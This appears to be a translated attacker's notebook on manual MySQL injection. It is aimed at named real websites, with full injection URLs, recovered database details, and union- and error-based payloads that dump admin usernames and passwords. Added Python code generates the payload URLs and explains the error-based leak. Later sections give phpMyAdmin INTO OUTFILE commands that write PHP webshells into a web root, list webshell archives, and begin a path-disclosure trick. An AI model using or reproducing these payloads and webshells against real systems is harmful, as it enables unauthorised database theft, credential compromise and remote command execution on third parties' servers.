Manual SQL injection notes
1.
Find the column count
http://www.osy-wine.com/news_show.php?id=-61 order by 24
Raise N in "order by N" until MySQL errors with "Unknown column 'N' in 'order clause'"; the largest N that does not error is the column count, here 24. (id=-61 matches no real row, so later only the UNION rows are rendered into the page.)
Read database information
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
The numbers that show up in the page are the positions that are displayed; put the expressions you want to read into those positions (here 2, 5 and 6):
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,user(),3,4,database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
user() ---------- osywine@115.160.154.39
version() -------- 5.0.91-log
MySQL 5.0 and later have the virtual database information_schema, which holds metadata for every database (schemata, tables, columns).
database() ------- osywine
2.
Use information_schema to enumerate the tables
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables+where+table_schema=0x6F737977696E65+limit+1,1
0x6F737977696E65 is osywine in hex; MySQL compares a hex literal as the string, so no quote characters are needed.
Step through the result rows with limit 0,1, limit 1,1, limit 2,1, ... one table name per request.
This turns up the admin table.
3.
Enumerate the table's columns
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E
gives id
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+1,1
gives username
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+2,1
gives password
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin
dumps the user name and password directly.
**********************************************************************************
Second method (more convenient, faster)
Dump all tables in one request
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_schema=0x6F737977696E65
0x6F737977696E65 is osywine in hex. DISTINCT is needed because information_schema.columns has one row per column, so each table name would otherwise repeat once per column (querying information_schema.tables instead avoids that). GROUP_CONCAT output is truncated at group_concat_max_len (1024 bytes by default), so a long table list may be cut off.
All tables:
aboutweb,admin,blog,ggao,liuyan,member,news,news_class,news_class2,photo,photo_class,products,products_class,products_class2,settle_accounts,shoping,youqinglj
The last step: dump the user names and passwords in one go.
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+username,0x5f,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin
(0x5f is "_", used as the separator between username and password inside GROUP_CONCAT.)
Note: every + above stands for a space; /**/ works as a replacement too. Which one gets through depends on the target's filtering, so test case by case.
Quick table dump
and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema=0x636164657475725F6361646532303036 (hex of the current database name; pad the select list to the real column count first)
http://www.cadeturcr.com/nuevo/pags/detalle_oferta.php?id=600 and 1=2 union select 1,2,group_concat(table_name),database(),user(),6,7,8,9 from information_schema.tables where table_schema=0x636164657475725F6361646532303036
Quick column dump
and 1=2 union select group_concat(column_name) from information_schema.columns where table_name=<hex of the table name>
Dump two columns at once (0x3a is ":")
and 1=2 union select 1,group_concat(username,0x3a,password),3,4,5 from <table>
The table name after FROM is an identifier, not a string, so it is written plainly and is not hex-encoded; hex literals only work in the WHERE comparisons above.
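The union-based steps above (ORDER BY probe, UNION SELECT with numeric padding, hex literals in WHERE, LIMIT walking, GROUP_CONCAT dumps) are generated below in one small Python module. This is an added example, not code from the original notes: it only builds and returns the payload strings and sends nothing. The column count 24, the osywine schema, the admin table and the target URL are taken from the notes; the function names are my own.

```python
"""Builder for the UNION-based MySQL injection payloads used in these notes.

Added example (not from the original notes). Nothing is sent; each function
returns a string so the steps can be generated instead of typed by hand.
"""
from urllib.parse import quote


def hex_literal(s: str) -> str:
    """Encode a string as a MySQL hex literal (0x...).

    In a comparison such as table_schema=0x6F737977696E65 MySQL treats the
    literal as the string "osywine", so no quote characters are needed.
    """
    return "0x" + s.encode("utf-8").hex().upper()


def decode_hex_literal(lit: str) -> str:
    """Inverse of hex_literal, for checking a literal copied from notes."""
    if lit[:2].lower() != "0x":
        raise ValueError("not a hex literal")
    return bytes.fromhex(lit[2:]).decode("utf-8")


def order_by_probe(n: int) -> str:
    """'order by N' probe; the largest N that does not error is the column count."""
    return f"order by {n}"


def union_select(column_count: int, exprs: dict, from_clause: str = "") -> str:
    """'union select 1,2,...,N' with the 1-based positions in `exprs` replaced.

    Positions that are rendered by the page are where data is read out; the
    rest stay numeric padding. Spaces become '+' as in the notes.
    """
    cols = [str(exprs.get(i, i)) for i in range(1, column_count + 1)]
    sql = f"union select {','.join(cols)}"
    if from_clause:
        sql += f" from {from_clause}"
    return sql.replace(" ", "+")


def tables_payload(column_count: int, schema: str, row: int) -> str:
    """One table name per request: walk the rows with 'limit row,1'."""
    frm = f"information_schema.tables where table_schema={hex_literal(schema)} limit {row},1"
    return union_select(column_count, {2: "table_name"}, frm)


def all_columns_payload(column_count: int, table: str) -> str:
    """All column names of one table in a single request via GROUP_CONCAT."""
    frm = f"information_schema.columns where table_name={hex_literal(table)}"
    return union_select(column_count, {5: "GROUP_CONCAT(DISTINCT column_name)"}, frm)


def dump_payload(column_count: int, table: str, cols: list, sep: str = "_") -> str:
    """Concatenate several columns of every row, joined by `sep` (hex-encoded).

    `table` goes after FROM as an identifier, so it is NOT hex-encoded.
    """
    inner = f",{hex_literal(sep)},".join(cols)
    return union_select(column_count, {5: f"GROUP_CONCAT(DISTINCT {inner})"}, table)


def build_url(base: str, param: str, value: str, payload: str) -> str:
    """Attach the payload to a query-string parameter; '+' stays the space
    substitute and only characters outside the payload alphabet are encoded."""
    return f"{base}?{param}={value}+{quote(payload, safe='+,()=*')}"


if __name__ == "__main__":
    base, param, value = "http://www.osy-wine.com/news_show.php", "id", "-61"
    print(build_url(base, param, value, order_by_probe(24)))
    print(build_url(base, param, value, tables_payload(24, "osywine", 1)))
    print(build_url(base, param, value, all_columns_payload(24, "admin")))
    print(build_url(base, param, value, dump_payload(24, "admin", ["username", "password"])))
    print(decode_hex_literal("0x636164657475725F6361646532303036"))
```

decode_hex_literal is the quick check for the "hex of the current database" claim in a copied payload; hex_literal emits upper-case digits, so the separator comes out as 0x5F where the notes wrote 0x5f (MySQL accepts both).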
Error-based extraction (floor(rand(0)*2) with GROUP BY). These payloads make MySQL group on a key built from floor(rand(0)*2); the key is evaluated once for the lookup and again on insert into the temporary table, so a collision raises "Duplicate entry '...' for key 'group_key'", and the concatenated value, wrapped in ~'...'~ (0x7e, 0x27), is printed in that error. The outer "from information_schema.tables" only supplies enough rows (at least three) for the collision to happen. hex(cast(... as char)) is used where the value may contain characters the error message would mangle. Walk results with limit 0,1, limit 1,1, ... as before.
Dump all databases
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Dump the current database
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Dump tables
and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x<hex of database name> limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Dump columns
and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x<hex of database name> and table_name=0x<hex of table name> limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Dump contents
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,<table>.<column>,0x27,0x7e) from <table> limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
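Why the floor(rand(0)*2) payloads above leak data through an error is easiest to see by simulating what MySQL's GROUP BY does with its temporary table. The following is an added example, not code from the original notes: the first values of floor(rand(0)*2) are the commonly cited sequence for MySQL's fixed seed 0 and are assumed here, and the function names are my own.

```python
"""Simulation of the floor(rand(0)*2) / GROUP BY duplicate-key trick.

Added example (not from the original notes). MySQL evaluates the GROUP BY
key once to look it up in the temporary table and, if absent, evaluates it
AGAIN when inserting the new row. With a non-deterministic key the second
value can already exist, and MySQL then raises
  "Duplicate entry '<key>' for key 'group_key'"
Because the secret is concatenated into the key, it appears in the error.
"""
import re

# First values of floor(rand(0)*2) in MySQL. rand(0) uses a fixed seed, so
# the sequence is the same on every server; this is the commonly cited
# start of it and is ASSUMED here, not measured.
RAND0_FLOOR2 = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1]


class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062 (ER_DUP_ENTRY)."""


def group_by_with_rand(prefix: str, rows: int, seq=RAND0_FLOOR2) -> dict:
    """Model `select count(*), concat(prefix, floor(rand(0)*2)) x ... group by x`
    over `rows` input rows. Returns the temp table if no collision occurs."""
    values = iter(seq)
    table = {}
    for _ in range(rows):
        key = f"{prefix}{next(values)}"       # evaluated for the lookup
        if key in table:
            table[key] += 1
            continue
        key = f"{prefix}{next(values)}"       # re-evaluated on insert
        if key in table:                      # collision: the leak
            raise DuplicateEntry(f"Duplicate entry '{key}' for key 'group_key'")
        table[key] = 1
    return table


def leaked_value(secret: str, rows: int = 3):
    """Run the simulated query with the notes' ~'...'~ wrapper and parse the
    secret back out of the error text. None if no error was produced."""
    try:
        group_by_with_rand(f"~'{secret}'~", rows)
    except DuplicateEntry as err:
        match = re.search(r"~'(.*?)'~", str(err))
        return match.group(1) if match else None
    return None


def error_payload(scalar_subquery: str) -> str:
    """Wrap a scalar subquery in the skeleton used by the payloads above, so
    its single value is concatenated into the group key."""
    return ("and(select 1 from(select count(*),concat(0x7e,0x27,(" + scalar_subquery +
            "),0x27,0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1")


if __name__ == "__main__":
    print(group_by_with_rand("x", 2))     # two rows: no collision yet
    print(leaked_value("osywine"))        # three rows: the value comes back
    print(error_payload("select database()"))
```

The sequence 0,1,1 is why at least three rows are needed: row 1 inserts key 1, row 2 finds key 1, and row 3 looks up key 0, misses, re-evaluates to 1 and collides. With only two rows nothing is leaked, which is the usual reason this payload "does nothing" on a near-empty schema.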
Dump all columns in one request
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E
0x61646D696E is admin in hex.
All columns:
id,username,password
Attachments: 大马+一句话(PHP).rar (big webshell + one-line shell, PHP, 12KB); 大马+一句话(ASP).rar (big webshell + one-line shell, ASP, 102KB)
Getting a shell through phpMyAdmin
With the root password, method 1
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `darkmoon1` FROM `mysql`.`darkmoon` INTO OUTFILE 'd:/wamp/www/darkmoon.php';DROP TABLE IF EXISTS `mysql`.`darkmoon`;
(The table is created in the mysql database, so the SELECT and DROP must qualify it with `mysql`. too unless mysql is the current database.)
Method 2
Create TABLE moon (darkmoon text NOT NULL);Insert INTO moon (darkmoon) VALUES('<?php @eval($_POST[pass]);?>');
select darkmoon from moon into outfile 'd:/wamp/www/darkmoon2.php';Drop TABLE IF EXISTS moon;
Method 3
select '<?php @eval($_POST[pass]);?>' INTO OUTFILE 'd:/wamp/www/darkmoon3.php'
Method 4
select '<?php echo \'\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'd:/wamp/www/darkmoon4.php'
then call 127.0.0.1/darkmoon4.php?cmd=net user
All four rely on SELECT ... INTO OUTFILE, which needs: the FILE privilege (root has it); secure_file_priv not restricting the target directory (empty by default on 5.0-era servers like the one above, but MySQL 5.7 and later restrict it to a single directory or disable file export entirely); a target file that does not already exist (INTO OUTFILE refuses to overwrite); a web root that the mysqld OS account can write to; and knowledge of the web root path, which is what the path-disclosure tricks below are for.
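Before trying any of the four INTO OUTFILE variants it is worth checking the server-side preconditions, because the failure modes look alike from phpMyAdmin. The following is an added example, not code from the original notes: it encodes MySQL's secure_file_priv rules (empty string: no restriction; NULL: import/export disabled; a directory: only paths inside it), the FILE privilege and the no-overwrite rule, and applies them to a target path. The values would normally come from SHOW VARIABLES LIKE 'secure_file_priv' and SHOW GRANTS; here they are constructed inputs, and nothing connects to a server.

```python
"""Preflight for SELECT ... INTO OUTFILE (added example, not from the notes).

Inputs are constructed; in practice secure_file_priv comes from
  SHOW VARIABLES LIKE 'secure_file_priv'
and the FILE privilege from SHOW GRANTS for the phpMyAdmin account.
"""
from pathlib import PurePosixPath, PureWindowsPath


def outfile_allowed(secure_file_priv, has_file_priv: bool, target: str,
                    target_exists: bool = False, windows: bool = True):
    """Return (allowed, reason) for `SELECT ... INTO OUTFILE target`.

    secure_file_priv: "" (no restriction), None (NULL: export disabled) or a
    directory (only files inside it may be written).
    """
    if not has_file_priv:
        return False, "account lacks the FILE privilege"
    if secure_file_priv is None:
        return False, "secure_file_priv is NULL: file import/export disabled"
    if target_exists:
        return False, "target exists: INTO OUTFILE refuses to overwrite"
    if secure_file_priv == "":
        return True, "secure_file_priv is empty: any path the mysqld OS user can write"
    # Windows paths compare case-insensitively; MySQL also accepts forward slashes there.
    if windows:
        base, tgt = PureWindowsPath(secure_file_priv.lower()), PureWindowsPath(target.lower())
    else:
        base, tgt = PurePosixPath(secure_file_priv), PurePosixPath(target)
    try:
        tgt.relative_to(base)
    except ValueError:
        return False, f"{target} is outside secure_file_priv={secure_file_priv}"
    return True, f"{target} is inside secure_file_priv={secure_file_priv}"


if __name__ == "__main__":
    cases = [
        ("", True, "d:/wamp/www/darkmoon.php"),                                   # 5.0-era default
        ("C:/ProgramData/MySQL/MySQL Server 5.7/Uploads/", True, "d:/wamp/www/darkmoon.php"),
        (None, True, "d:/wamp/www/darkmoon.php"),
        ("", False, "d:/wamp/www/darkmoon.php"),
    ]
    for priv, has_file, path in cases:
        print(outfile_allowed(priv, has_file, path))
```

Even when this returns True the write can still fail at the OS level: the file is created by the mysqld service account, not by the web server, so that account needs write access to the web root.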
PHP path disclosure, all methods
1. Single-quote path disclosure
Append a single quote to the URL. Requires that the quote is not escaped (magic_quotes_gpc=off) and that the server returns its default error output (display_errors on), which includes the script's full path.
www.xxx.com/news.php?id=149